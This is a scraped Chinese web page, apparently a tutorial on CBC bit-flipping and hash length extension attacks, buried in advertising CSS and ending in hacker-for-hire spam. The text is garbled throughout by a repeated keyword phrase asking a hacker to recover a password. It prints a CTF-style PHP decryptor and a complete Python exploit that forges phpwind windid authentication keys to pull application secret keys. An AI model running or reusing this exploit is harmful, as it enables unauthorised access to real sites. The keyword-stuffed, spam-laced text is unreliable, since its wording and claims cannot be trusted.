.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-true {
FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click {
WIDTH: 96px; FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click A {
COLOR: #ff2f62
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc {
LINE-HEIGHT: 26px; 求黑客帮我找回 *** 密码 HEIGHT: 26px; FONT-SIZE: 12px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc A {
COLOR: #7b7b7b
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn 求黑客帮我找回 *** 密码 {
MARGIN-TOP: 19px; FLOAT: right; MARGIN-RIGHT: 18px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn DIV {
BORDER-BOTTOM: 求黑客帮我找回 *** 密码 0px; TEXT-ALIGN: center; BORDER-LEFT: 0px; LINE-HEIGHT: 32px; BACKGROUND-COLOR: #ff2f62; WIDTH: 100px; FONT-FAMI *** : Microsoft YaHei; HEIGHT: 32px; COLOR: #fff; FONT-SIZE: 16px; BORDER-TOP: 0px; CURSOR: pointer; BORDER-RIGHT: 0px; border-radius: 16px; 求黑客帮我找回 *** 密码 -webkit-border-radius: 16px; -moz-border-radius: 16px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-jian {
BACKGROUND-IMAGE: url(http://ecma.bdimg.com/public03/imageplus/append/nova_txt_star_160426.png); POSITION: absolute; WIDTH: 22px; BACKGROUND-REPEAT: 求黑客帮我找回 *** 密码 no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 3px; LEFT: 10px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-close-btn {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-logo {
DISPLAY: 求黑客帮我找回 *** 密码 none
}
.imageplus-append-nova-txt-ue2 .imageplus-baidu-logo {
Z-INDEX: 9999; POSITION: absolute; WIDTH: 16px; BOTTOM: 0px; BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px -17px; HEIGHT: 16px; RIGHT: 0px
} .imageplus-append-nova-txt-ue2 .imageplus-ad-logo {
Z-INDEX: 12; POSITION: absolute; WIDTH: 34px; BOTTOM: 0px; BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px 0px; HEIGHT: 16px; OVERFLOW: hidden; LEFT: 0px
}
.imageplus-append {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: relative; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; TEXT-INDENT: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline-block; BACKGROUND: none 求黑客帮我找回 *** 密码 transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append DIV {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: 求黑客帮我找回 *** 密码 static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; 求黑客帮我找回 *** 密码 OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append A {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM:求黑客帮我找回 *** 密码 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; 求黑客帮我找回 *** 密码 PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append IMG {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; 求黑客帮我找回 *** 密码 PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
求黑客帮我找回 *** 密码
.imageplus-append SPAN {BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft 求黑客帮我找回 *** 密码 YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
Features:
因为CBC模式是将前一个密文分组和明文分组进行混合加密所以,是可以避免ECB模式的弱点。
但正因为如此,导致了解密时修改前一个密文分组就可以操纵后一个的解密后的明文分组,可以将前一个密文中的任意比特进行修改(0,1进行互换,也可以叫翻转)
因此CBC模式有两个攻击点:①vi向量,影响之一个明文分组 ②第n个密文分组,影响第n+1个明文分组
Example:
在比赛中遇到过很多次,基本上属于对一个密文分组进行翻转之后能够提升权限或者绕过验证的作用,自己写了一个差不多的,攻击密文的,大求黑客帮我找回 *** 密码家可以看看
大概就是这样,要获得FLAG需要让ID=0,而我们是可以从URL中知道密文的
http://127.0.0.1/cbc2.php?a=89b52bac0331cb0b393c1ac82求黑客帮我找回 *** 密码8b4ee0f07861f030a8a3dc4b6e786f473b52182000a0d4ce2145994573a92d257a514d1
我们现在要对密文进行翻转攻击,但是并不清楚哪部分对应的是ID的上一个密文,可以直接脚本进行FUZZ,也可是使用burp(intruder)进行测试(选择攻击的密文)
选择攻击模式
}
.imageplus-append-nova-txt {
BOX-SIZING: border-box; BORDER-BOTTOM: #f2f2f2 1px solid; BORDER-LEFT: #f2f2f2 1px solid; LINE-HEIGHT: normal; FONT-FAMI *** : Microsoft YaHei; 求黑客帮我找回 *** 密码 BORDER-TOP: #f2f2f2 1px solid; BORDER-RIGHT: #f2f2f2 1px solid
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item {
POSITION: relative; BACKGROUND-COLOR: #fff; WIDTH: 100%; HEIGHT: 50px
}
.imageplus-append-nova-txt 求黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item A:hover {
TEXT-DECORATION: underline
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item DIV {
LINE-HEIGHT: 25px; MARGIN: 0px 16px; WIDTH: auto; TEXT-OVERFLOW: ellipsis; WHITE-SPACE: nowrap; HEIGHT: 25px; OVERFLOW: hidden; WORD-BREAK: keep-all; 求黑客帮我找回 *** 密码 FONT-WEIGHT: normal
}
.imageplus-append-nova-txt .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title SPAN {
COLOR: #003397; FONT-SIZE: 14px; FONT-WEIGHT: bold
}
.imageplus-append-nova-txt 求黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc SPAN {
COLOR: #333; FONT-SIZE: 12px
}
.imageplus-append-jian {
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_append_jian_151204.png); 求黑客帮我找回 *** 密码 POSITION: absolute; WIDTH: 20px; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 20px; TOP: 0px; LEFT: 0px
}
.imageplus-append-close-btn {
BACKGROUND-IMAGE: url(http://ecmb.bdimg.com/public03/imageplus_m_求黑客帮我找回 *** 密码append_close_btn_151113.png); POSITION: absolute; WIDTH: 40px; DISPLAY: none; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 0px; RIGHT: 0px
}
.imageplus-append-logo {
POSITION: absolute; WIDTH: 18px; BOTTOM: 0px; 求黑客帮我找回 *** 密码 BACKGROUND: url(http://cpro.baidustatic.com/cpro/ui/noexpire/img/2.0.1/bg.png) no-repeat left top; HEIGHT: 18px; RIGHT: 0px
}
.imageplus-append-nova-txt-ue2 {
BORDER-BOTTOM: #ddd 1px solid; BORDER-LEFT: #ddd 1px solid; BACKGROUND-COLOR: #f9f9f9; 求黑客帮我找回 *** 密码 FONT-FAMI *** : Microsoft YaHei; FLOAT: left; BORDER-TOP: #ff2f62 3px solid; BORDER-RIGHT: #ddd 1px solid
}
.imageplus-append-nova-txt-ue2 A:focus {
OUTLINE-STYLE: none; OUTLINE-COLOR: invert; OUTLINE-WIDTH: 0px
}
.imageplus-append-nova-txt-ue2 求黑客帮我找回 *** 密码 .imageplus-append-content {
FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item {
PADDING-BOTTOM: 5px; HEIGHT: 60px; MARGIN-LEFT: 44px; PADDING-TOP: 求黑客帮我找回 *** 密码 5px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item DIV {
TEXT-OVERFLOW: ellipsis; 求黑客帮我找回 *** 密码 WHITE-SPACE: nowrap; OVERFLOW: hidden; WORD-BREAK: keep-all
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title {
LINE-HEIGHT: 30px; HEIGHT: 30px; FONT-SIZE: 16px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title A {
COLOR: #000
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-true {
FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title 求黑客帮我找回 *** 密码 .imageplus-append-nova-txt-title-click {
WIDTH: 96px; FLOAT: left
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-title .imageplus-append-nova-txt-title-click A {
求黑客帮我找回 *** 密码 COLOR: #ff2f62
}
.imageplus-append-nova-txt-ue2 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc {
LINE-HEIGHT: 26px; HEIGHT: 26px; FONT-SIZE: 12px
}
.imageplus-append-nova-txt-ue2 求黑客帮我找回 *** 密码 .imageplus-append-content .imageplus-append-nova-txt-ad-item .imageplus-append-nova-txt-ad-item-desc A {
COLOR: #7b7b7b
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn {
MARGIN-TOP: 19px; FLOAT: right; MARGIN-RIGHT: 18px
} .imageplus-append-nova-txt-ue2 .imageplus-append-go-btn A {
TEXT-DECORATION: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-go-btn DIV {
BORDER-BOTTOM: 0px; TEXT-ALIGN: center; BORDER-LEFT: 0px; LINE-HEIGHT: 32px; 求黑客帮我找回 *** 密码 BACKGROUND-COLOR: #ff2f62; WIDTH: 100px; FONT-FAMI *** : Microsoft YaHei; HEIGHT: 32px; COLOR: #fff; FONT-SIZE: 16px; BORDER-TOP: 0px; CURSOR: pointer; BORDER-RIGHT: 0px; border-radius: 16px; -webkit-border-radius: 16px; -moz-border-radius: 16px
}
.imageplus-append-nova-txt-ue2 求黑客帮我找回 *** 密码 .imageplus-append-jian {
BACKGROUND-IMAGE: url(http://ecma.bdimg.com/public03/imageplus/append/nova_txt_star_160426.png); POSITION: absolute; WIDTH: 22px; BACKGROUND-REPEAT: no-repeat; BACKGROUND-POSITION: 0px 0px; HEIGHT: 40px; TOP: 3px; LEFT: 求黑客帮我找回 *** 密码 10px
}
.imageplus-append-nova-txt-ue2 .imageplus-append-close-btn {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-append-logo {
DISPLAY: none
}
.imageplus-append-nova-txt-ue2 .imageplus-baidu-logo 求黑客帮我找回 *** 密码 {
Z-INDEX: 9999; POSITION: absolute; WIDTH: 16px; BOTTOM: 0px; BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px -17px; HEIGHT: 16px; RIGHT: 0px
}
.imageplus-append-nova-txt-ue2 .imageplus-ad-logo {
Z-INDEX: 求黑客帮我找回 *** 密码 12; POSITION: absolute; WIDTH: 34px; BOTTOM: 0px; BACKGROUND: url(http://ecma.bdimg.com/public03/imageplus/logo.png) no-repeat 0px 0px; HEIGHT: 16px; OVERFLOW: hidden; LEFT: 0px
}
.imageplus-append {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; 求黑客帮我找回 *** 密码 POSITION: relative; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; TEXT-INDENT: 0px; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline-block; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: 求黑客帮我找回 *** 密码 hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append DIV {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 求黑客帮我找回 *** 密码 normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: block; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -求黑客帮我找回 *** 密码webkit-box-sizing: content-box
}
.imageplus-append A {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; 求黑客帮我找回 *** 密码 DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append 求黑客帮我找回 *** 密码 IMG {
BOX-SIZING: content-box; BORDER-BOTTOM: 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: 求黑客帮我找回 *** 密码 none transparent scroll repeat 0% 0%; FLOAT: none; VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
.imageplus-append SPAN {
BOX-SIZING: content-box; BORDER-BOTTOM: 求黑客帮我找回 *** 密码 0px; POSITION: static; TEXT-ALIGN: left; BORDER-LEFT: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: normal; MARGIN: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; DISPLAY: inline; FONT-FAMI *** : Microsoft YaHei; BACKGROUND: none transparent scroll repeat 0% 0%; FLOAT: none; 求黑客帮我找回 *** 密码 VISIBILITY: visible; OVERFLOW: visible; BORDER-TOP: 0px; BORDER-RIGHT: 0px; PADDING-TOP: 0px; -webkit-box-sizing: content-box
}
攻击结果
burp的翻转并不是遍历所有翻转的可能每一位变动一次,比如101101的之一次为101100,那么的二次就是101110,第三次是101000,依次类推。
所以burp可能无法完全翻转出需要的payload,但是可以帮我确定需要翻转的位置,我们经过简单的计算就能得到自己需要的值
比如这里进过对比,我们轻松的找到了需要翻转的位置,但是却没有得到为0的翻转,数学不及格的我来算算。xor运算的特点:a xor b =c abc三个数任意两个运算可得到第三个,所以
0b的10求黑客帮我找回 *** 密码进制是11
11xor5=14
14xor0=14
14的十进制为0e
FUZZ反转成功。
最后在提求黑客帮我找回 *** 密码醒下:AES128位一组,换成16进制其实我们反转的的是之一组。但影响的却是第二组
我们这个演示的是攻击密文的,攻击iv的,基本相似,有兴趣的可以去看看OWASP里面的,那个是攻击iv的
cbc.php:
$cipherText 求黑客帮我找回 *** 密码 = $_GET['a'];//89b52bac0331cb0b393c1ac828b4ee0f07861f030a8a3dc4b6e786f473b52182000a0d4ce2145994573a92d257a514d1
$padkey = hex2bin('66616974683434343407070707070707');
$iv = hex2bin('f4ebb2df9c29efd7625561求黑客帮我找回 *** 密码a15096cd24');
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
if (mcrypt_generic_init($td, $padkey, $iv) != -1)
{
$p_t = mdecrypt_generic($td, hex2bin($cipherText));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$tmp 求黑客帮我找回 *** 密码 = explode(':',$p_t);
if ($tmp[2]=='0'){
print @'id:'.@$tmp[2].'';
echo 'Flag is T00ls become better';
}
else{
echo 'Your are noob! *** noob!!';
echo @'id:'.@$tmp[2].'';
echo @'name:'求黑客帮我找回 *** 密码.@$tmp[0].'';
echo @'email:'.@$tmp[1].'';
}
}
function pad2Length($text, $padlen){
$len = strlen($text)%$padlen;
$res = $text;
$span = $padlen-$len;
for($i=0; $i$span; $i++){
$res .= chr($span);
}
return $res;
}
function trimEnd($text){
$len = strlen($text);
$c = $text[$len-1];
if(ord($c) $len){
for($i=$len-ord($c); $i$len; $i++){
if($text[$i] != $c){
return $text;
}
}
return 求黑客帮我找回 *** 密码 substr($text, 0, $len-ord($c));
}
return $text;
}
Hash-Length-Extension-Attack
许多算法都使用的Merkle–Damgård construction,比如MD5,和SHA-1等,因此这些算法都受到Length-Extension-Attack。
要说清这个攻击原理,我们还是简单说说SHA-1
Features:
SHA-1处求黑客帮我找回 *** 密码理消息前会先对消息进行填充,使整个消息成为512比特的整数倍,每个分组均为512比特
①填充(Padding),方式为将多余的消息后面加一位,且为1,然后后面全部使用0填充使整个分组变为448比特,而最后的64比特会记录原始消息的长度,填充后每个分组均为512比特。
②然后就是复杂的数学计算~_~我也看的不是特别懂,但是并不影响我们理解。简单说说就行,首先会定义5个32比特的值(缓冲区初始值,是不是加起来刚好160比特~~,可以理解为iv),
然后大概就是每个分组会经过了80步的处理,然后求黑客帮我找回 *** 密码会输出新的5个32比特的值,这个时候我们可以理解原始消息已经充分混入这160比特里面,再用这5个数作为初始值去去处理下一个分组,依次类推,最后得到的hash其实就是这5个数,可以看看我画的便于理解的草图:
Example:
Hash-Length-Extension-Attack ,可以在知道MD5(message)的hash值得情况下,算出MD5(message+padding+a)的hash值,就是根据短的消息的hash算出更长的消息的hash。
为什么呢,其实看了上面的图就会觉得很简单了。我们把hash反排序一下不久又得到5个新的32个比特值吗(此处是可以逆向MD5的算法的),我们可以用这5个数继续消息混合,而我们之前padding的数据就会成为整个求黑客帮我找回 *** 密码消息的一部分说以能够算出MD5(message+padding+a),a就是我们要继续混合的消息。
这类漏洞一般出现在CTF中比较多,类型都是费否等于MAC == hash(message+test) message未知或者只知晓一部分,不过都不重要,重要是的message的长度,因为会影响到拓展后的消息,不知道的话就需要爆破,然后test位置可控,这样才能拓展,MAC一般也是可控,校验通过就能下一步哈哈,或者拿flag。
之前我们都是看的CTF(L-ctf也有一部分,拓展后可以下载压缩包),我们就来看求黑客帮我找回 *** 密码看phpwind的MD5 padding 漏洞
其实是windidserver接口验证缺陷,用扩展攻击绕过验证就可以执行接口中的其他控制器中的其他 *** ~~
这个函数会在执行控制其 *** 之前执行,进行验证,然而我们发现$_windidkey可以自己输入,只要是appkey的结果相等就能通过验证
public function beforeAction($handlerAdapter) {
parent::beforeAction($handlerAdapter);
求黑客帮我找回 *** 密码$charset = 'utf-8';
$_windidkey = $this->getInput('windidkey', 'get');
$_time = (int)$this->getInput('time', 'get');
$_clientid = (int)$this->getInput('clientid', 'get');
if (!$_time || !$_clientid) $this->output(WindidError::FAIL);
$clent 求黑客帮我找回 *** 密码 = $this->_getAppDs()->getApp($_clientid);
if (!$clent) $this->output(WindidError::FAIL);
if (WindidUtility::appKey($clent['id'], $_time, $clent['secretkey'], $this->getRequest()->getGet(null), $this->getRequest()->求黑客帮我找回 *** 密码getPost()) != $_windidkey) $this->output(WindidError::FAIL);
$time = Pw::getTime();
if ($time - $_time > 1200) $this->output(WindidError::TIMEOUT);
$this->appid = $_clientid;
}
既然都已经说了是这类型的漏洞,那我们肯定就要找能找到的hash
showFlash这里满足要求(打印出了hash 求黑客帮我找回 *** 密码 822382cb79f915c779943a1dc131f00c)
public function showFlash($uid, $appId, $appKey, $getHtml = 1) {
$time = Pw::getTime();
$key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'flash', 'm'=>'api', 求黑客帮我找回 *** 密码 'a'=>'doAvatar', 'c'=>'avatar'), array('uid'=>'undefined'));
$key2 = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'normal', 'm'=>'api', 'a'=>'doAvatar', 'c'=>'avatar'), array());
我们再跟踪appkey
public 求黑客帮我找回 *** 密码 static function appKey($apiId, $time, $secretkey, $get, $post) {
// 注意这里需要加上__data,因为下面的buildRequest()里加了。
$array = array('windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token',
'Filename', 'Upload', 'token', '__data');
$str 求黑客帮我找回 *** 密码 = '';
ksort($get);
ksort($post);
foreach ($get AS $k=>$v) {
if (in_array($k, $array)) continue;
$str .=$k.$v;
}
foreach ($post AS $k=>$v) {
if (in_array($k, $array)) continue;
$str .=$k.$v;
求黑客帮我找回 *** 密码
}return md5(md5($apiId.'||'.$secretkey).$time.$str);
}
经过各种排序,我们可以得出这个hash的值和消息的结构
822382cb79f915c779943a1dc131f00c = md5(md5().$time.$str)
822382cb79f915c779943a1dc131f00c= md5 +1475841959 + 求黑客帮我找回 *** 密码 adoAvatarcavatarmapitypeflashuid2uidundefined
里面的md5值不知道,但是是32位,$time.$str都是可控,那么我们就可以拓展这个消息,得到新的hash,而调用这个函数进行验证的得地方自然也就绕过了验证 $_windidkey我们只要传入拓展后的hash即可绕过。因为我们拓展时必须保持md5 +1475841959 + adoAvatarcavatarmapitypeflashuid2uidundefined的结构,然而排序的时候回因为传入的a(action)参数导致打乱循序,无法扩展,但是因为phpwind的路由支持post,所以post一下控制器(c),模块(m),动作(a)这三个参数
$_windidkey(我们拓展的hash)== 求黑客帮我找回 *** 密码 md5 +1475841959 + adoAvatarcavatarmapitypeflashuid2uidundefined +padding +alistcappmapi(post排序的)正好绕过验证
填写一下cookie和url就可以获得secretkey(调用的list *** ,要实现其他action自行修改,getshell就暂不讨论,这不是我们这里的重点
#coding=utf-求黑客帮我找回 *** 密码8
import urllib
import urllib2
import time
import cookielib
import gzip
import StringIO
from bs4 import BeautifulSoup
import re
import hashpumpy
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
def 求黑客帮我找回 *** 密码 get_key(url):
url = url + '/?m=profile&c=avatar&_left=avatar'
response = opener.open(url)
html = response.read()
if response.info().get('Content-Encoding') == 'gzip':
stream = StringIO.StringIO(html)
with 求黑客帮我找回 *** 密码 gzip.GzipFile(fileobj=stream) as f:
html = f.read()
soup = BeautifulSoup(html, 'lxml')
key_url = soup.find('param',attrs={'name':'FlashVars'}).get('value')
key_url = urllib.unquote(key_url)
rule = 求黑客帮我找回 *** 密码 'uid=(.+?)&windidkey=(.+?)&time=(.+?)&clientid=(.+?)&type'
Pattern = re.compile(rule, re.S)
rs = re.findall(Pattern, key_url)
return rs[0]
def padding_exten(windidkey,time,uid):
hexdigest = windidkey
original_data = 求黑客帮我找回 *** 密码 time+'adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined'
data_to_add = 'alistcappmapi'
key_length = 32
result = list()
rs = hashpumpy.hashpump(hexdigest,original_data,data_to_add,key_length)
result.append(rs[0])
tmp = str(rs)
tmp = 求黑客帮我找回 *** 密码 tmp.split(',')[1]
tmp = tmp.split("\'")[1]
tmp = tmp.replace('\\x','%')
rule = 'undefined(.+?)alist'
Pattern = re.compile(rule, re.S)
tmp = re.findall(Pattern, tmp)
result.append(tmp[0])
return result
if 求黑客帮我找回 *** 密码 __name__ == '__main__':
url = 'http://192.168.0.100/phpwind'
cookie = 'CNZZDATA1257835621=169451052-1472798292-null%7C1472798292; PHPSESSID=5adaadb063b4208acd574d3d044dda38; ECS[visit_times]=5; csrf_token=ab686222777d7f80; 求黑客帮我找回 *** 密码 xzr_winduser=PbUcCS1OT1ZjCzY8GoJOV8EOvix9OdGpc%2BmWBPYV6ar07B7AZSOhSw%3D%3D; xzr_lastvisit=7%091475751418%09%2Fphpwind%2F%3Fm%3Dprofile%26c%3Davatar%26_left%3Davatar; xzr_visitor=cx59FPbNJ4FYG2e9cWKpUP%2FTZTef7Yu4DTFLTftwwZ%2FPEVo8'
cj = cookielib.CookieJar()
opener = 求黑客帮我找回 *** 密码 urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'))
opener.addheaders.append(('Accept', '*/*'))
opener.addheaders.append(('Accept-求黑客帮我找回 *** 密码Language', 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'))
opener.addheaders.append(('Accept-Encoding', 'gzip, deflate'))
opener.addheaders.append(('Connection', 'keep-alive'))
opener.addheaders.append(('Cookie', cookie))
opener.addheaders.append((求黑客帮我找回 *** 密码'Cache-Control', 'max-age=0'))
uid, windidkey, time, clientid = get_key(url)
windidkey, padding = padding_exten(windidkey,time,uid)
payload = '/windid/index.php?time='+time+'&windidkey='+windidkey+'&clientid='+clientid+'&adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined='+padding
url 求黑客帮我找回 *** 密码 = url + payload
data = {'m':'api','c':'app','a':'list'}
data = urllib.urlencode(data)
response = opener.open(url,data)
html = response.read()
if response.info().get('Content-求黑客帮我找回 *** 密码Encoding') == 'gzip':
stream = StringIO.StringIO(html)
with gzip.GzipFile(fileobj=stream) as f:
html = f.read()
print html
。多用Python吧如果服务器(网站)被入侵了,一般都是服务器或者网站存在漏洞,被黑客利用并提权入侵的,导致服务器中木马,网站被挂黑链,被篡改,被挂马。解决办法:如果程序。专业诚信黑客帮忙追款 千万不要找求黑客帮我找回 *** 密码黑客当男朋友换个手机号 , 以后登 *** 用手机 就可以了。 上网可以用 *** ,也可以在 *** 里设置。还可以网页登 *** 啊。 其实这是相对的,要上网就必须告诉终端你的 物理、。 专业诚信黑客帮忙追款1、百度魅族,进入魅族官网;2、向下滑动,点击在线 *** ;3、选择人工 *** ,说明情况;4、提供发票、保修卡等相关证明,请 *** 协助解锁。 小一点公司不看学历的,没学历不影响啥,只要你水平够。编程本来主要就要靠自学。 VB准确的说不是比较基础,而是比较简单,但事实上我不认为它适合黑客。这并不是说VB就写不出来一个好的求黑客帮我找回 *** 密码黑客软件。但问题是VB的运行需要动态连接库的支持。专业诚信黑客帮忙追款 周星驰主演的电影《九品芝麻官》里面的,邹兆龙演的常威。 专业诚信黑客帮忙追款理论上可以实现,只要可以入侵中国移动的系统,但是这只是理论上,因为入侵这种系统不仅仅是技术需要高,而且带来的法律风险太高了,挣你这点酬金不值得。所以。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
